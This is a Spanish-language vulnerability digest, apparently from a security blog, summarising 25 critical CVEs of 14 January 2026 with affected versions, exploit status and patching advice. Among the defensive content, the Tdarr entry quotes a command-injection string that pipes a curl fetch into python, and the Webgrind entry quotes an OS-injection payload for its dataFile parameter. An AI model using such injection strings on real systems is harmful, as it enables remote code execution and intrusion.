Resumen vulnerabilidades críticas – 25 elementos (14 ene 2026 Europe/Madrid)
miércoles, 14 de enero de 2026
| CVE | Vendor | Producto | Severidad | VAfectadas | Exploit |
|---|---|---|---|---|---|
| CVE-2026-21858 | n8n | n8n Workflow Automation | Se esta Explotando | Versiones afectadas no especificadas explícitamente; se recomienda confirmar con el proveedor | Sí |
| CVE-2026-20805 | Microsoft | AfectadoDesktop Window Manager | Se está Explotando | No especificadas públicamente | Confirmados y activos |
| CVE-2025-40805 | Siemens | AfectadoDispositivos afectados con API vulnerables | CRITICAL (10) | No especificadas explicitamente | No |
| CVE-2025-11250 | Zohocorp | AfectadoManageEngine ADSelfService Plus | CRITICAL (9.1) | versiones anteriores a 6519 | No |
| CVE-2026-0879 | Mozilla Foundation | Firefox y Firefox ESR | CRITICAL (9.8) | Firefox | No |
| CVE-2026-0881 | Mozilla | Firefox | CRITICAL (10) | Versiones anteriores a la 147 | No |
| CVE-2026-0884 | Mozilla Foundation | Firefox y Firefox ESR | CRITICAL (9.8) | Firefox | No |
| CVE-2026-0892 | Mozilla Foundation | Firefox y Thunderbird | CRITICAL (9.8) | Firefox | No |
| CVE-2026-22755 | Vivotek | AfectadoDispositivos Vivotek modelos FD8365, FD8365v2, FD9165, FD9171, FD9187, FD9189, FD9365, FD9371, FD9381, FD9387, FD9389, FD9391, FE9180, FE9181, FE9191, FE9381, FE9382, FE9391, FE9582, IB9365, IB93587LPR, IB9371, IB9381, IB9387, IB9389, IB939, IP9165, IP9171, IP9172, IP9181, IP9191, IT9389, MA9321, MA9322, MS9321, MS9390, TB9330 (módulos de firmware) | CRITICAL (9.3) | Versiones de firmware: 0100a, 0106a, 0106b, 0107a, 0107b_1, 0109a, 0112a, 0113a, 0113d, 0117b, 0119e, 0120b, 0121, 0121d, 0121d_48573_1, 0122e, 0124d_48573_1, 012501, 012502, 0125c | No |
| CVE-2025-12548 | Eclipse Foundation | Eclipse Che che-machine-exec | CRITICAL (9) | Versiones que usan che-machine-exec con API JSON-RPC | No |
| CVE-2025-47855 | Fortinet | FortiFone | CRITICAL (9.8) | 7.0.0 a 7.0.1, 3.0.13 a 3.0.23 | No |
| CVE-2025-64155 | Fortinet | AfectadoFortiSIEM | CRITICAL (9.8) | 7.4.0, 7.3.0 a 7.3.4, 7.1.0 a 7.1.8, 7.0.0 a 7.0.4, 6.7.0 a 6.7.10 | No |
| CVE-2025-68271 | OpenC3 | AfectadoCOSMOS | CRITICAL (10) | De la 5.0.0 a la 6.10.1 | No |
| CVE-2026-23478 | Cal.com | Cal.com (software de programación open-source) | CRITICAL (10) | Desde la 3.1.6 hasta antes de la 6.0.7 | No |
| CVE-2020-36911 | Covenant Project | Covenant | CRITICAL (9.3) | 0.1.3 – 0.5 | Sí |
| CVE-2022-50893 | VIAVIWEB | Wallpaper Admin 1.0 | CRITICAL (9.3) | Versión 1.0 | Sí |
| CVE-2022-50912 | ImpressCMS | ImpressCMS | CRITICAL (9.3) | 1.4.4 | No |
| CVE-2022-50919 | Tdarr | Tdarr | CRITICAL (9.3) | 2.00.15 | Sí |
| CVE-2023-54329 | Inbit | Inbit Messenger | CRITICAL (9.3) | 4.6.0 – 4.9.0 | Sí |
| CVE-2023-54330 | Inbit Soft | Inbit Messenger | CRITICAL (9.3) | 4.6.0 a 4.9.0 | Sí |
| CVE-2023-54335 | eXtplorer Project | eXtplorer | CRITICAL (9.3) | 2.1.14 | No |
| CVE-2023-54339 | Webgrind | AfectadoWebgrind 1.1 | CRITICAL (9.3) | Versión 1.1 | Sí |
| CVE-2026-22686 | Agentfront | enclave-vm | CRITICAL (10) | Versiones anteriores a 2.7.0 | No |
| CVE-2025-14301 | Opvius | AfectadoIntegration Opvius AI for WooCommerce plugin para WordPress | CRITICAL (9.8) | Todas las versiones hasta la 1.3.0 inclusive | No |
| CVE-2025-14502 | WordPress Plugin Developer | News and Blog Designer Bundle plugin para WordPress | CRITICAL (9.8) | Todas las versiones hasta e incluyendo la 1.1 | No |
| CVE | CVE-2026-21858 |
| Severidad | Se esta Explotando |
| Importancia para la empresa | ALTA |
| Publicado | 13/01/2026 |
| Vendor | n8n |
| Producto | n8n Workflow Automation |
| Versiones | Versiones afectadas no especificadas explícitamente; se recomienda confirmar con el proveedor |
| Exploit Públicos | No se confirma existencia de exploits públicos, pero la explotación activa está reportada |
| Referencia | CVE-2026-21858, KEV, FAQ KEV |
| Descripción | Vulnerabilidad en la validación incorrecta de entradas en n8n que puede permitir a atacantes aprovechar el sistema debido a una insuficiente validación de datos de entrada. |
| Importancia | Esta vulnerabilidad permite la explotación activa debido a validaciones insuficientes, facilitando ejecución de acciones no autorizadas o manipulación de datos a través de entradas maliciosas. |
| Estrategia | Aplicar inmediatamente parches oficiales emitidos por n8n y validar exhaustivamente todas las entradas externas en las plataformas afectadas. Además, monitorizar activamente indicadores de compromiso para detectar actividades inusuales que puedan revelar intentos de explotación. |
| CVE | CVE-2026-20805 |
| Severidad | Se está Explotando |
| Importancia para la empresa | ALTA |
| Publicado | 13/01/2026 |
| Fabricante | Microsoft |
| Producto Afectado | Desktop Window Manager |
| Versiones Afectadas | No especificadas públicamente |
| Exploit Públicos | Confirmados y activos |
| Referencia | Vulncheck CVE-2026-20805, KEV Browse, Vulncheck FAQ |
| Descripción | Vulnerabilidad en Desktop Window Manager de Microsoft con evidencia confirmada de explotación activa en entornos reales. |
| Importancia | Esta vulnerabilidad permite que atacantes ejecuten código arbitrario aprovechando fallos en Desktop Window Manager, afectando potencialmente la confidencialidad y disponibilidad de sistemas críticos. Se está explotando activamente, lo que representa un riesgo real elevado para la empresa. |
| Estrategia | Aplicar inmediatamente los parches oficiales de Microsoft para Desktop Window Manager. Implementar monitoreo activo de indicadores de compromiso relacionados y controlar accesos para mitigar riesgo de explotación. Priorizar actualizaciones en sistemas críticos para evitar infiltraciones. |
| CVE | CVE-2025-40805 |
| Severidad | CRITICAL (10) |
| Importancia para la empresa | ALTA |
| Publicado | mar, 13 ene 2026, 11:15 (hora de España) |
| Fabricante | Siemens |
| Producto Afectado | Dispositivos afectados con API vulnerables |
| Versiones Afectadas | No especificadas explicitamente |
| Exploit Públicos | No confirmados |
| Referencia | Siemens Security Advisory |
| Descripción | Los dispositivos afectados no aplican correctamente la autenticación de usuario en puntos específicos de sus API. Esto podría facilitar que un atacante remoto no autenticado evada la autenticación y suplante a un usuario legítimo. Para la explotación exitosa, se requiere que el atacante conozca la identidad de un usuario válido. |
| Estrategia | Actualizar cuanto antes el firmware o software con el parche oficial que corrija la autenticación en las API. Implementar controles adicionales de monitoreo y detección de accesos anómalos, limitar el conocimiento público de identidades de usuarios y reforzar las políticas de autenticación y autorización para minimizar riesgos de suplantación. |
| CVE | CVE-2025-11250 |
| Severidad | CRITICAL (9.1) |
| Importancia para la empresa | ALTA |
| Publicado | mar, 13 ene 2026, 15:16 (hora de España) |
| Fabricante | Zohocorp |
| Producto Afectado | ManageEngine ADSelfService Plus |
| Versiones Afectadas | versiones anteriores a 6519 |
| Exploit Públicos | No confirmados |
| Referencia | ManageEngine Advisory |
| Descripción | Zohocorp ManageEngine ADSelfService Plus versiones anteriores a 6519 son vulnerables a la omisión de autenticación debido a configuraciones incorrectas de filtros. Esta vulnerabilidad permite a un atacante evitar los controles nativos de autenticación y obtener acceso no autorizado. |
| Estrategia | Actualizar inmediatamente a la versión 6519 o superior para corregir la configuración errónea que permite el bypass de autenticación. Revisar configuraciones de filtros y fortalecer la monitorización de accesos para detectar intentos no autorizados de acceso. |
| CVE | CVE-2026-0879 |
| Severidad | CRITICAL (9.8) |
| Importancia para la empresa | ALTA |
| Publicado | mar, 13 ene 2026, 15:16 (hora de España) |
| Vendor | Mozilla Foundation |
| Producto | Firefox y Firefox ESR |
| Versiones | Firefox < 147, Firefox ESR < 115.32, Firefox ESR < 140.7 |
| Exploit Públicos | No confirmado |
| Referencia | Ver detalle oficial |
| Descripción | Escape del sandbox debido a condiciones límite incorrectas en el componente de gráficos. Esta vulnerabilidad afecta a Firefox < 147, Firefox ESR < 115.32 y Firefox ESR < 140.7. |
| Estrategia | Actualizar inmediatamente a versiones ≥ Firefox 147 o ESR 115.32 / 140.7 para eliminar el riesgo. Monitorizar posibles indicios de explotación, ya que un escape de sandbox puede permitir a un atacante ejecutar código fuera de las restricciones del navegador, comprometiendo la seguridad global del sistema. |
| CVE | CVE-2026-0881 |
| Severidad | CRITICAL (10) |
| Importancia para la empresa | ALTA |
| Publicado | mar, 13 ene 2026, 15:16 (hora de España) |
| Vendor | Mozilla |
| Producto | Firefox |
| Versiones | Versiones anteriores a la 147 |
| Exploit Públicos | No confirmados |
| Referencia | Bugzilla Mozilla CVE-2026-0881 |
| Descripción | Escape del sandbox en el componente del sistema de mensajería. Esta vulnerabilidad afecta a Firefox en versiones anteriores a la 147.
Esta vulnerabilidad permite a un atacante escapar del entorno controlado (sandbox) y potencialmente ejecutar código malicioso fuera de las restricciones normales, lo que puede comprometer la seguridad del sistema del usuario y exponerlo a ataques más sofisticados. |
| Estrategia | Actualizar inmediatamente Firefox a la versión 147 o superior que corrige esta vulnerabilidad. Reforzar políticas de navegación segura y monitorizar posibles signos de explotación, ya que aunque no se confirman exploits públicos, el impacto es crítico. |
| CVE | CVE-2026-0884 |
| Severidad | CRITICAL (9.8) |
| Importancia para la empresa | ALTA |
| Publicado | mar, 13 ene 2026, 15:16 (hora de España) |
| Vendor | Mozilla Foundation |
| Producto | Firefox y Firefox ESR |
| Versiones | Firefox < 147 y Firefox ESR < 140.7 |
| Exploit Públicos | No confirmados |
| Referencia | Informe oficial de Mozilla |
| Descripción | Use-after-free en el componente del motor JavaScript. Esta vulnerabilidad afecta a Firefox versiones anteriores a la 147 y Firefox ESR versiones anteriores a la 140.7. Permite que un atacante pueda ejecutar código arbitrario aprovechando un acceso a memoria liberada, lo que puede derivar en la toma de control del sistema o la ejecución de código malicioso desde el navegador. |
| Estrategia | Actualizar inmediatamente Firefox y Firefox ESR a las versiones 147 y 140.7 respectivamente o superiores. Monitorizar actividad anómala en entornos con estas versiones y bloquear tráfico malicioso asociado. Reforzar políticas de actualización automática y formación para evitar exposición a versiones vulnerables. |
| CVE | CVE-2026-0892 |
| Severidad | CRITICAL (9.8) |
| Importancia para la empresa | ALTA |
| Publicado | mar, 13 ene 2026, 15:16 (hora de España) |
| Vendor | Mozilla Foundation |
| Producto | Firefox y Thunderbird |
| Versiones | Firefox < 147 y Thunderbird 146 |
| Exploit Públicos | No confirmados |
| Referencia | Mozilla Bugzilla |
| Descripción | Errores de seguridad de memoria presentes en Firefox 146 y Thunderbird 146. Algunos de estos errores mostraron evidencia de corrupción de memoria y se presume que con suficiente esfuerzo podrían haber sido explotados para ejecutar código arbitrario. Esta vulnerabilidad afecta a Firefox anteriores a la versión 147. |
| Estrategia | Actualizar inmediatamente a Firefox 147 o superior y a la versión parcheada de Thunderbird. Monitorizar sistemas para detectar actividad sospechosa relacionada con corrupción de memoria y aplicar principios de seguridad en capas para mitigar posibles explotaciones. |
| CVE | CVE-2026-22755 |
| Severidad | CRITICAL (9.3) |
| Importancia para la empresa | ALTA |
| Publicado | mar, 13 ene 2026, 16:16 (hora de España) |
| Vendor | Vivotek |
| Producto Afectado | Dispositivos Vivotek modelos FD8365, FD8365v2, FD9165, FD9171, FD9187, FD9189, FD9365, FD9371, FD9381, FD9387, FD9389, FD9391, FE9180, FE9181, FE9191, FE9381, FE9382, FE9391, FE9582, IB9365, IB93587LPR, IB9371, IB9381, IB9387, IB9389, IB939, IP9165, IP9171, IP9172, IP9181, IP9191, IT9389, MA9321, MA9322, MS9321, MS9390, TB9330 (módulos de firmware) |
| Versiones Afectadas | Versiones de firmware: 0100a, 0106a, 0106b, 0107a, 0107b_1, 0109a, 0112a, 0113a, 0113d, 0117b, 0119e, 0120b, 0121, 0121d, 0121d_48573_1, 0122e, 0124d_48573_1, 012501, 012502, 0125c |
| Exploit Públicos | No confirmados |
| Referencia | Vapid Labs Advisory |
| Descripción | Vulnerabilidad de Neutralización Inadecuada de Elementos Especiales utilizados en un Comando («inyección de comandos») en dispositivos Vivotek modelo FD8365, FD8365v2, FD9165, FD9171, FD9187, FD9189, FD9365, FD9371, FD9381, FD9387, FD9389, FD9391, FE9180, FE9181, FE9191, FE9381, FE9382, FE9391, FE9582, IB9365, IB93587LPR, IB9371, IB9381, IB9387, IB9389, IB939, IP9165, IP9171, IP9172, IP9181, IP9191, IT9389, MA9321, MA9322, MS9321, MS9390, TB9330 en sus módulos de firmware (versiones indicadas) permite la ejecución remota de comandos del sistema operativo. Esto expone los dispositivos a la ejecución arbitraria de comandos que pueden comprometer la integridad y disponibilidad del sistema afectado. |
| Estrategia | Aplicar inmediatamente las actualizaciones oficiales del firmware que corrijan esta vulnerabilidad. En paralelo, restringir el acceso a la administración de los dispositivos solo a redes confiables y usar firewalls para minimizar la superficie de ataque. Monitorizar logs y tráfico por posibles intentos de explotación. |
| CVE | CVE-2025-12548 |
| Severidad | CRITICAL (9) |
| Importancia para la empresa | ALTA |
| Publicado | mar, 13 ene 2026, 17:15 (hora de España) |
| Vendor | Eclipse Foundation |
| Producto | Eclipse Che che-machine-exec |
| Versiones | Versiones que usan che-machine-exec con API JSON-RPC / websocket no autenticada en puerto TCP 3333 |
| Exploit Públicos | No confirmados |
| Referencia | Detalle del aviso de seguridad Red Hat |
| Descripción | Se encontró una falla en Eclipse Che che-machine-exec. Esta vulnerabilidad permite la ejecución remota arbitraria de comandos sin autenticación y la exfiltración de secretos (claves SSH, tokens, etc.) desde contenedores del espacio de trabajo de otros desarrolladores, mediante una API JSON-RPC / websocket expuesta sin autenticación en el puerto TCP 3333. |
| Estrategia | Aplicar inmediatamente el parche oficial actualizado por Eclipse Che para che-machine-exec que corrige el acceso no autenticado a la API en el puerto 3333. Restringir el acceso al puerto 3333 con firewalls internos y monitorizar intentos de conexión sospechosos para detectar posibles explotaciones. |
| CVE | CVE-2025-47855 |
| Severidad | CRITICAL (9.8) |
| Importancia para la empresa | ALTA |
| Publicado | mar, 13 ene 2026, 18:15 (hora de España) |
| Vendor | Fortinet |
| Producto | FortiFone |
| Versiones | 7.0.0 a 7.0.1, 3.0.13 a 3.0.23 |
| Exploit Públicos | No confirmados |
| Referencia | Fortinet Advisory FG-IR-25-260 |
| Descripción | Exposición de información sensible a un actor no autorizado [CWE-200] en Fortinet FortiFone 7.0.0 hasta 7.0.1 y FortiFone 3.0.13 hasta 3.0.23 que permite a un atacante no autenticado obtener la configuración del dispositivo mediante solicitudes HTTP o HTTPS manipuladas. |
| Estrategia | Actualizar inmediatamente a versiones corregidas. Restringir acceso HTTP/HTTPS a dispositivos FortiFone mediante controles de red. Monitorizar tráfico web en busca de solicitudes inusuales para detectar posibles intentos de explotación. |
| CVE | CVE-2025-64155 |
| Severidad | CRITICAL (9.8) |
| Importancia para la empresa | ALTA |
| Publicado | mar, 13 ene 2026, 18:15 (hora de España) |
| Fabricante | Fortinet |
| Producto Afectado | FortiSIEM |
| Versiones Afectadas | 7.4.0, 7.3.0 a 7.3.4, 7.1.0 a 7.1.8, 7.0.0 a 7.0.4, 6.7.0 a 6.7.10 |
| Exploit Públicos | No confirmados |
| Referencia | Fortinet Advisory |
| Descripción | Vulnerabilidad de neutralización inadecuada de elementos especiales usados en un comando del sistema operativo (‘inyección de comando OS’) en Fortinet FortiSIEM 7.4.0, 7.3.0 a 7.3.4, 7.1.0 a 7.1.8, 7.0.0 a 7.0.4 y 6.7.0 a 6.7.10. Esta falla permite a un atacante ejecutar código o comandos no autorizados mediante solicitudes TCP diseñadas. |
| Estrategia | Actualizar inmediatamente a las versiones corregidas proporcionadas por Fortinet. Monitorizar tráfico TCP anómalo y restringir acceso externo al FortiSIEM para prevenir accesos no autorizados y explotación remota. |
| CVE | CVE-2025-68271 |
| Severidad | CRITICAL (10) |
| Importancia para la empresa | ALTA |
| Publicado | mar, 13 ene 2026, 20:16 (hora de España) |
| Fabricante | OpenC3 |
| Producto Afectado | COSMOS |
| Versiones Afectadas | De la 5.0.0 a la 6.10.1 |
| Exploit Públicos | No confirmados |
| Referencia | GitHub Advisory OpenC3 COSMOS |
| Descripción | OpenC3 COSMOS proporciona la funcionalidad necesaria para enviar comandos y recibir datos de uno o más sistemas embebidos. Desde la versión 5.0.0 hasta la 6.10.1, COSMOS contiene una vulnerabilidad crítica de ejecución remota de código accesible a través de la API JSON-RPC. Cuando una solicitud JSON-RPC usa la forma string de ciertas APIs, el texto del parámetro controlado por el atacante se convierte en valores mediante String#convert_to_value que, para entradas tipo array, ejecuta eval(). Debido a que la ruta del código cmd analiza la cadena de comando antes de llamar a authorize(), un atacante no autenticado puede disparar la ejecución de código Ruby aunque la petición falle la autorización (401). Esta vulnerabilidad está corregida en la versión 6.10.2. |
| Estrategia | Priorizar la actualización inmediata a la versión 6.10.2 o superior para eliminar esta vulnerabilidad crítica. Además, restringir el acceso a la API JSON-RPC sólo a usuarios autenticados y monitorizar intentos de acceso no autorizado para detectar posibles exploitaciones. Implementar defensas en profundidad como controles de ejecución de código y aislamiento de procesos donde sea posible. |
| CVE | CVE-2026-23478 |
| Severidad | CRITICAL (10) |
| Importancia para la empresa | ALTA |
| Publicado | Mar, 13 ene 2026, 23:16 (hora de España) |
| Vendor | Cal.com |
| Producto | Cal.com (software de programación open-source) |
| Versiones | Desde la 3.1.6 hasta antes de la 6.0.7 |
| Exploit Públicos | No confirmados |
| Referencia | GitHub Advisory de Cal.com |
| Descripción | Cal.com es un software de programación open-source. Desde la versión 3.1.6 hasta antes de la 6.0.7, existe una vulnerabilidad en un callback personalizado de NextAuth JWT que permite a atacantes obtener acceso autenticado completo a cualquier cuenta de usuario al proporcionar una dirección de correo electrónico objetivo mediante session.update(). Esta vulnerabilidad está corregida en la versión 6.0.7. |
| Estrategia | Actualizar inmediatamente el software a la versión 6.0.7 o superior para eliminar la vulnerabilidad. Monitorizar intentos sospechosos de actualización de sesión y controlar accesos inusuales a cuentas. Implementar controles de acceso rigurosos y autenticación multifactor para mitigar posibles explotaciones hasta aplicar el parche. |
| CVE | CVE-2020-36911 |
| Severidad | CRITICAL (9.3) |
| Importancia para la empresa | ALTA |
| Publicado | mié, 14 ene 2026, 00:15 (hora de España) |
| Vendor | Covenant Project |
| Producto | Covenant |
| Versiones | 0.1.3 – 0.5 |
| Exploit Públicos | Sí, se conocen técnicas para explotación |
| Referencia | Covenant Advisory |
| Descripción | Covenant 0.1.3 – 0.5 contiene una vulnerabilidad de ejecución remota de código que permite a los atacantes crear tokens JWT maliciosos con privilegios administrativos. Los atacantes pueden generar tokens falsificados con roles de administrador y subir cargas útiles DLL personalizadas para ejecutar comandos arbitrarios en el sistema objetivo. |
| Estrategia | Actualizar de inmediato a una versión corregida de Covenant si está disponible; implementar controles estrictos de validación y firma de tokens JWT; monitorizar accesos y actividades sospechosas; restringir la ejecución de DLL externas para mitigar carga de código malicioso. Prioridad máxima para prevenir accesos no autorizados y ejecución remota. |
| CVE | CVE-2022-50893 |
| Severidad | CRITICAL (9.3) |
| Importancia para la empresa | ALTA |
| Publicado | mié, 14 ene 2026, 00:15 (hora de España) |
| Vendor | VIAVIWEB |
| Producto | Wallpaper Admin 1.0 |
| Versiones | Versión 1.0 |
| Exploit Públicos | Sí, disponible en exploit-db |
| Referencia | Exploit-DB CVE-2022-50893</td |
| Descripción | VIAVIWEB Wallpaper Admin 1.0 contiene una vulnerabilidad de ejecución remota de código sin autenticación en la funcionalidad de carga de imágenes. Los atacantes pueden subir un archivo PHP malicioso a través del endpoint add_gallery_image.php para ejecutar código arbitrario en el servidor. |
| Estrategia | Actualizar inmediatamente a una versión parcheada o aplicar mitigaciones como restringir el acceso al endpoint vulnerable, implementar validación estricta en las cargas de archivos y monitorizar el servidor para detectar actividades anómalas. Priorizar esta vulnerabilidad debido al exploit público disponible y el riesgo crítico de compromiso total del servidor. |
| CVE | CVE-2022-50912 |
| Severidad | CRITICAL (9.3) |
| Importancia para la empresa | ALTA |
| Publicado | mié, 14 ene 2026, 00:15 (hora de España) |
| Vendor | ImpressCMS |
| Producto | ImpressCMS |
| Versiones | 1.4.4 |
| Exploit Públicos | No confirmados |
| Referencia | GitHub ImpressCMS |
| Descripción | ImpressCMS 1.4.4 contiene una vulnerabilidad en la carga de archivos debido a una sanitización débil de las extensiones que permite a atacantes subir archivos potencialmente maliciosos. Los atacantes pueden eludir las restricciones de carga usando extensiones alternativas como .php2, .php6, .php7, .phps y .pht para ejecutar código PHP arbitrario en el servidor. |
| Estrategia | Actualizar inmediatamente a una versión corregida de ImpressCMS. Implementar validación y filtrado estrictos de extensiones de archivos en la carga para evitar bypass mediante extensiones poco comunes. Monitorizar actividad sospechosa de ejecución remota de código y revisar logs para detectar posibles explotaciones. |
| CVE | CVE-2022-50919 |
| Severidad | CRITICAL (9.3) |
| Importancia para la empresa | ALTA |
| Publicado | mié, 14 ene 2026, 00:15 (hora de España) |
| Vendor | Tdarr |
| Producto | Tdarr |
| Versiones | 2.00.15 |
| Exploit Públicos | Sí |
| Referencia | Tdarr Official Site |
| Descripción | Tdarr 2.00.15 contiene una vulnerabilidad de ejecución remota de código sin autenticación en su terminal de ayuda que permite a atacantes inyectar y encadenar comandos arbitrarios. Los atacantes pueden explotar la falta de filtrado de entradas encadenando comandos como `–help; curl .py | python` para ejecutar código remoto sin necesidad de autenticación. |
| Estrategia | Actualizar inmediatamente a una versión parcheada de Tdarr que corrija esta vulnerabilidad. Mientras tanto, restringir el acceso al terminal de ayuda para evitar que usuarios no autenticados puedan usarlo, y monitorizar cualquier actividad sospechosa que indique explotación activa. |
| CVE | CVE-2023-54329 |
| Severidad | CRITICAL (9.3) |
| Importancia para la empresa | ALTA |
| Publicado | mié, 14 ene 2026, 00:15 (hora de España) |
| Vendor | Inbit |
| Producto | Inbit Messenger |
| Versiones | 4.6.0 – 4.9.0 |
| Exploit Públicos | Sí |
| Referencia | Repositorio de Explotación Pública |
| Descripción | Inbit Messenger versiones 4.6.0 a 4.9.0 contiene una vulnerabilidad de ejecución remota de comandos que permite a atacantes no autenticados ejecutar comandos arbitrarios explotando un desbordamiento de pila en el protocolo del messenger. Los atacantes pueden enviar paquetes XML especialmente diseñados al puerto 10883 con una carga maliciosa para desencadenar la vulnerabilidad y ejecutar comandos con privilegios de sistema. |
| Estrategia | Actualizar urgentemente Inbit Messenger a una versión parcheada superior a la 4.9.0. Mientras tanto, restringir el acceso al puerto 10883 desde redes no confiables y monitorizar intentos de envío de paquetes XML maliciosos para detectar posibles explotaciones activas. |
| CVE | CVE-2023-54330 |
| Severidad | CRITICAL (9.3) |
| Importancia para la empresa | ALTA |
| Publicado | mié, 14 ene 2026, 00:16 (hora de España) |
| Vendor | Inbit Soft |
| Producto | Inbit Messenger |
| Versiones | 4.6.0 a 4.9.0 |
| Exploit Públicos | Sí |
| Referencia | Github Writeup |
| Descripción | Las versiones 4.6.0 a 4.9.0 de Inbit Messenger contienen una vulnerabilidad remota de desbordamiento de búfer basado en pila que permite a atacantes no autenticados ejecutar código arbitrario enviando paquetes de red malformados. Los atacantes pueden construir una carga útil especialmente diseñada que apunta al manejador de red del messenger para sobrescribir el Manejador de Excepciones Estructuradas (SEH) y ejecutar código shell en sistemas Windows vulnerables. |
| Estrategia | Actualizar inmediatamente Inbit Messenger a una versión parcheada superior a la 4.9.0. En caso de no poder actualizar de inmediato, bloquear el tráfico no confiable hacia el messenger, especialmente en puertos utilizados por el servicio. Monitorizar activamente posibles intentos de explotación usando IDS/IPS y logs de red para detectar paquetes malformados y la sobrescritura del SEH. |
| CVE | CVE-2023-54335 |
| Severidad | CRITICAL (9.3) |
| Importancia para la empresa | ALTA |
| Publicado | mié, 14 ene 2026, 00:16 (hora de España) |
| Vendor | eXtplorer Project |
| Producto | eXtplorer |
| Versiones | 2.1.14 |
| Exploit Públicos | No confirmados |
| Referencia | Sitio oficial de eXtplorer |
| Descripción | eXtplorer 2.1.14 contiene una vulnerabilidad de omisión de autenticación que permite a atacantes acceder sin contraseña manipulando la solicitud de inicio de sesión. Los atacantes pueden explotar esta falla para subir archivos PHP maliciosos y ejecutar comandos remotos en el sistema de gestión de archivos vulnerable. |
| Importancia | Esta vulnerabilidad permite control total remoto sin autenticación previa, poniendo en riesgo la integridad y disponibilidad del sistema. Es probable que pueda estar siendo explotada activamente dado su perfil crítico y facilidad de explotación. |
| Estrategia | Aplicar inmediatamente el parche oficial o actualizar a una versión corregida. Mientras tanto, restringir el acceso a la aplicación desde redes no confiables y monitorizar actividad anómala en los logs para detectar intentos de explotación. |
| CVE | CVE-2023-54339 |
| Severidad | CRITICAL (9.3) |
| Importancia para la empresa | ALTA |
| Publicado | mié, 14 ene 2026, 00:16 (hora de España) |
| Fabricante | Webgrind |
| Producto Afectado | Webgrind 1.1 |
| Versiones Afectadas | Versión 1.1 |
| Exploit Públicos | Sí, payloads conocidos para RCE |
| Referencia | Webgrind GitHub |
| Descripción | Webgrind 1.1 contiene una vulnerabilidad de ejecución remota de comandos que permite a atacantes no autenticados inyectar comandos del sistema operativo a través del parámetro dataFile en index.php. Los atacantes pueden ejecutar comandos arbitrarios manipulando dataFile, por ejemplo con el payload ‘0%27%26calc.exe%26%27’ para ejecutar comandos en el sistema objetivo. |
| Estrategia | Actualizar inmediatamente a una versión parcheada si está disponible o aplicar mitigaciones de filtrado y validación estricta en el parámetro dataFile para evitar inyección. Monitorizar actividad sospechosa y restringir el acceso externo a la aplicación para minimizar riesgo de explotación. |
| CVE | CVE-2026-22686 |
| Severidad | CRITICAL (10) |
| Importancia para la empresa | ALTA |
| Publicado | mié, 14 ene 2026, 01:15 (hora de España) |
| Vendor | Agentfront |
| Producto | enclave-vm |
| Versiones | Versiones anteriores a 2.7.0 |
| Exploit Públicos | No confirmados |
| Referencia | Commit patch CVE-2026-22686 en enclave-vm |
| Descripción | Enclave es un entorno seguro (sandbox) para JavaScript diseñado para la ejecución segura de código de agentes de IA. Antes de la versión 2.7.0, existe una vulnerabilidad crítica de escape de sandbox en enclave-vm que permite a código JavaScript no confiable, pero confinado, ejecutar código arbitrario en el runtime anfitrión de Node.js. Cuando una invocación de herramienta falla, enclave-vm expone un objeto Error del lado anfitrión al código confinado. Este objeto Error mantiene su cadena de prototipos del ámbito anfitrión, la cual puede ser recorrida para alcanzar el constructor Function del anfitrión. Un atacante puede desencadenar intencionadamente un error anfitrión y luego escalar por la cadena de prototipos. Usando ese constructor Function, puede compilar y ejecutar JavaScript arbitrario en el contexto anfitrión, eludiendo completamente la sandbox y accediendo a recursos sensibles como process.env, sistema de archivos y red. Esto rompe la garantía principal de seguridad de enclave-vm de aislar código no confiable. La vulnerabilidad ha sido corregida en la versión 2.7.0. |
| Evaluación | Esta vulnerabilidad permite la ejecución remota de código arbitrario desde un contexto que debería estar aislado, comprometiendo la confidencialidad e integridad del sistema anfitrión. Aunque no se han reportado exploits públicos confirmados aún, la gravedad y facilidad de explotación hacen que sea crítico priorizar esta vulnerabilidad para evitar accesos no autorizados a recursos internos sensibles. |
| Estrategia | Actualizar urgentemente enclave-vm a la versión 2.7.0 o superior. Además, reforzar el monitoreo de accesos y errores en entornos que utilicen sandboxing para detectar intentos de explotación, y limitar privilegios del proceso Node.js para minimizar posibles daños en caso de escape. |
| CVE | CVE-2025-14301 |
| Severidad | CRITICAL (9.8) |
| Importancia para la empresa | ALTA |
| Publicado | mié, 14 ene 2026, 07:15 (hora de España) |
| Fabricante | Opvius |
| Producto Afectado | Integration Opvius AI for WooCommerce plugin para WordPress |
| Versiones Afectadas | Todas las versiones hasta la 1.3.0 inclusive |
| Exploit Públicos | No confirmados |
| Referencia | Referencia oficial</td |
| Descripción | El plugin Integration Opvius AI para WooCommerce en WordPress es vulnerable a un Path Traversal en todas las versiones hasta la 1.3.0 inclusive. Esto se debe a que la función process_table_bulk_actions() procesa rutas de archivos suministradas por el usuario sin controles de autenticación, verificación nonce ni validación de ruta. Esto permite a atacantes no autenticados borrar o descargar archivos arbitrarios en el servidor mediante el parámetro POST wsaw-log[], pudiendo eliminar archivos críticos como wp-config.php o leer archivos de configuración sensibles. |
| Evaluación | Esta vulnerabilidad permite ataques de gran impacto sin necesidad de autenticación, facilitando la eliminación o lectura de archivos críticos para el funcionamiento y seguridad del sitio, lo que puede comprometer gravemente la infraestructura de la empresa. |
| Estrategia | Actualizar inmediatamente a una versión parcheada del plugin. Mientras tanto, restringir el acceso a los endpoints afectados con controles de autenticación, implementar reglas de firewall web (WAF) para filtrar parámetros maliciosos y monitorizar actividades anómalas que intenten explotar la vulnerabilidad. |
| CVE | CVE-2025-14502 |
| Severidad | CRITICAL (9.8) |
| Importancia para la empresa | ALTA |
| Publicado | mié, 14 ene 2026, 07:15 (hora de España) |
| Vendor | WordPress Plugin Developer |
| Producto | News and Blog Designer Bundle plugin para WordPress |
| Versiones | Todas las versiones hasta e incluyendo la 1.1 |
| Exploit Públicos | No confirmados |
| Referencia | Enlace al código vulnerable |
| Descripción | El plugin News and Blog Designer Bundle para WordPress es vulnerable a Inclusión Local de Archivos (LFI) en todas las versiones hasta e incluyendo la 1.1 mediante el parámetro template. Esto permite a atacantes no autenticados incluir y ejecutar archivos .php arbitrarios en el servidor, lo que posibilita la ejecución de cualquier código PHP en esos archivos. Puede usarse para evadir controles de acceso, obtener datos sensibles o ejecutar código, especialmente si se permiten cargas de archivos .php. |
| Estrategia | Actualizar inmediatamente a una versión corregida o eliminar el plugin si no es crítico. Restrinja la carga de archivos PHP en el servidor y aplique controles estrictos sobre la gestión de archivos. Monitorice logs para detectar intentos de explotación y bloquee accesos sospechosos. La vulnerabilidad es muy crítica y puede comprometer totalmente el sistema. |
Enviar a un amigo:
Categories: Check Vulnerabilidades
